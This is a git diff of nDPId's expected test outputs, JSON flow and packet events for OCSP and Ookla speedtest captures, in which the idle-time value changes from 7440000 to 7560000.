+00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1623227472211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472211,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8cDxAAEAGbm3AqAGAl2UCheoSAFClxR9VAAAAAKAC+vA6IAAAAgQFtAQCCApcSasVAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAbRut"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1623227472214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623227472214,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADYG6KmXZQKFwKgBgABQ6hJzFOMDpcUfVqAS\/\/9zqQAAAgQFTAQCCAoCSmlaXEmrFQEDAwkZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkey68"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1623227472218,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623227472218,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0cD1AAEAGbnTAqAGAl2UCheoSAFClxR9WcxTjBIAQAfagEQAAAQEIClxJqx0CSmlaGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyyO91A=="} +00851{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623227472211,"flow_last_seen":1623227472219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":401,"flow_tot_l4_payload_len":401,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1623227472219,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.globalsign.com","url":"ocsp.globalsign.com\/gsrsaovsslca2018","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":224,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1623226796047,"flow_last_seen":1623226963037,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":799,"flow_tot_l4_payload_len":3558,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1623227472228,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"93.184.220.29","src_port":47904,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":275,"packets-processed":274,"total-skipped-flows":0,"total-l4-data-len":23358,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":52,"global_ts_msec":1623229632695} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229632695,"flow_last_seen":1623229632695,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1623229632695,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632695,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA82G5AAEAGQmzAqAGAbUbwcrHKAFDtwUNWAAAAAKAC+vAcMQAAAgQFtAQCCAoRKRyhAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZRLNb"} -00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1623229632706,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632706,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADUGJdttRvBywKgBgABQscrfcozQ7cFDV6AScSAwDQAAAgQFtAQCCAq9uUvmESkcoQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSBFoQ"} -00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1623229632711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229632711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA02G9AAEAGQnPAqAGAbUbwcrHKAFDtwUNX33KM0YAQAfbN9AAAAQEIChEpHLC9uUvmGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0EjACA=="} -00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229850956,"flow_last_seen":1623229850956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229850956,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1623229850956,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850956,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8+shAAEAGBi7AqAGAFwxgkb+KAFDAJRPhAAAAAKAC+vCvFgAAAgQFtAQCCAqOHkIzAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACxCLhj"} -00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1623229850968,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850968,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGCPcXDGCRwKgBgABQv4rZVTUewCUT4qAS\/ohT3AAAAgQFtAQCCAoG1UJIjh5CMwEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABvS4I1"} -00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1623229850972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229850972,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0+slAAEAGBjXAqAGAFwxgkb+KAFDAJRPi2VU1H4AQAfZ\/KgAAAQEICo4eQkQG1UJIGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAV7trsA=="} -00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":320,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1623229853240,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229632695,"flow_last_seen":1623229632695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229632695,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":275,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1623229632695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632695,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA82G5AAEAGQmzAqAGAbUbwcrHKAFDtwUNWAAAAAKAC+vAcMQAAAgQFtAQCCAoRKRyhAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADZRLNb"} +00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":276,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1623229632706,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229632706,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADUGJdttRvBywKgBgABQscrfcozQ7cFDV6AScSAwDQAAAgQFtAQCCAq9uUvmESkcoQEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADSBFoQ"} +00540{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":277,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1623229632711,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229632711,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA02G9AAEAGQnPAqAGAbUbwcrHKAFDtwUNX33KM0YAQAfbN9AAAAQEIChEpHLC9uUvmGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0EjACA=="} +00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":278,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229632695,"flow_last_seen":1623229632711,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":399,"flow_tot_l4_payload_len":399,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":1623229632711,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp09.actalis.it","url":"ocsp09.actalis.it\/VA\/AUTHOV-G3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00680{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1623227472211,"flow_last_seen":1623227587356,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1344,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.2.133","src_port":59922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00678{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":284,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1623227471703,"flow_last_seen":1623227587366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1006,"flow_tot_l4_payload_len":1402,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1623229632732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.85.15.92","src_port":49382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1623229850956,"flow_last_seen":1623229850956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1623229850956,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":299,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1623229850956,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850956,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8+shAAEAGBi7AqAGAFwxgkb+KAFDAJRPhAAAAAKAC+vCvFgAAAgQFtAQCCAqOHkIzAAAAAAEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAACxCLhj"} +00550{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":300,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1623229850968,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":40,"thread_ts_msec":1623229850968,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgGCPcXDGCRwKgBgABQv4rZVTUewCUT4qAS\/ohT3AAAAgQFtAQCCAoG1UJIjh5CMwEDAwcZgREJACAAIAEAAAEAAAAIAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAABvS4I1"} +00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1623229850972,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":32,"thread_ts_msec":1623229850972,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA0+slAAEAGBjXAqAGAFwxgkb+KAFDAJRPi2VU1H4AQAfZ\/KgAAAQEICo4eQkQG1UJIGYERCQAgACABAAABAAAACAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAV7trsA=="} +00828{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":302,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1623229850956,"flow_last_seen":1623229850973,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1623229850973,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"},"http": {"hostname":"ocsp.entrust.net","url":"ocsp.entrust.net\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko\/20100101 Firefox\/89.0"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":320,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1623229632695,"flow_last_seen":1623229697742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":2724,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1623229853240,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"109.70.240.114","src_port":45514,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1623229850956,"flow_last_seen":1623229968257,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7031,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1623229968257,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"23.12.96.145","src_port":49034,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCSP","breed":"Safe","category":"Network"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":344,"source":"ocsp.pcapng","alias":"nDPId-test","packets-captured":344,"packets-processed":344,"total-skipped-flows":0,"total-l4-data-len":33113,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":10,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":67,"global_ts_msec":1623229968257} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 344/344 diff --git a/test/results/ookla.pcap.out b/test/results/ookla.pcap.out index b00a11a2f..ad79ccfd1 100644 --- a/test/results/ookla.pcap.out +++ b/test/results/ookla.pcap.out @@ -1,17 +1,17 @@ 00456{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ookla.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00542{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1491069108756} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491069108756,"flow_last_seen":1491069108756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491069108756,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"46.44.253.187","src_port":51207,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491069108756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1491069108756,"pkt":"gCqojWksxCwDBkn+CABFAABAClpAAEAGAADAqAEHLiz9u8gHAFAHQx4AAAAAALAC\/\/\/tyQAAAgQFtAEDAwUBAQgKDd4HoAAAAAAEAgAA"} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491069108793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1491069108793,"pkt":"xCwDBkn+gCqojWksCABFAAA8AABAADMGWiUuLP27wKgBBwBQyAdRUNK1B0MeAaASOJAJ5wAAAgQFrAQCCAp\/4XDqDd4HoAEDAwU="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ookla.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491069108793,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491069108793,"pkt":"gCqojWksxCwDBkn+CABFAAA0s5FAAEAGAADAqAEHLiz9u8gHAFAHQx4BUVDStoAQECztvQAAAQEICg3eB8R\/4XDq"} 